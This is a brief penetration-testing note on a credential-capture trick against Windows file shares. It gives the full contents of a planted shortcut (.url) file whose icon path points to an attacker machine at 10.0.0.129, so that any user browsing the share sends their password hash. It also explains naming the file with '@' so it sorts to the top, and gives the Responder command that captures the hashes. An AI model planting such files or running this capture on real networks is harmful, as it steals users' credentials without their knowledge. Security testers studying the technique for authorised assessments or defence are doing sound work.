<aside> 📌 Summary
</aside>
This is a simple attack to retrieve even more user hashes. The idea is to leave a file with an icon that calls our machine. Then with tools like Responder, we can capture the hash of any user that passes by the share where we dropped it.
The core of the attack is to create a file with the required parameters to trigger a capture, here the icon of a link file triggers Responder.
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\\\10.0.0.129\\%USERNAME%.icon
IconIndex=1
The idea is to name it with a character to put this file at the top of the target share. From Notepad, we will write “@smthg” to allow the @ to be considered.
Finally, we open Responder and let it run
responder -I ens33
